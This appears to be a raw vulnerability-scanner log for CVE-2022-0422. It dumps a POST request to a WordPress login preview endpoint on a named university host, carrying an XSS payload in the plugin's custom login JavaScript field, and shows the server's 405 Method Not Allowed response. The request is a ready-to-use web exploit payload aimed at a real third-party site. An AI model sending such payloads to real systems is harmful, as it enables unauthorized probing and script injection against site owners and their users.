[CVE-2022-0422] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-login.php?wlcms-action=preview


POST /wp-login.php?wlcms-action=preview HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B
[CVE-2022-0422] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-login.php?wlcms-action=preview

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:01 GMT
Server: AmazonS3
Via: 1.1 4182a074185cd4c9b91519add9c7edf6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Xw6OZcVkxYMLaLgYZv_S0xoIlEGm6zetttkj0yJKp-gHIAR0HjqbAw==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: X4B6WY71N0C9G5FX</li>
<li>HostId: DY2GtuEA7xEzhGhLKW3/ETSKApBH8hpJQVzQyePD5pdrvxCI8Ol4yJgIkNFS0xkOGKDlRYOjGWc=</li>
</ul>
<hr/>
</body>
</html>

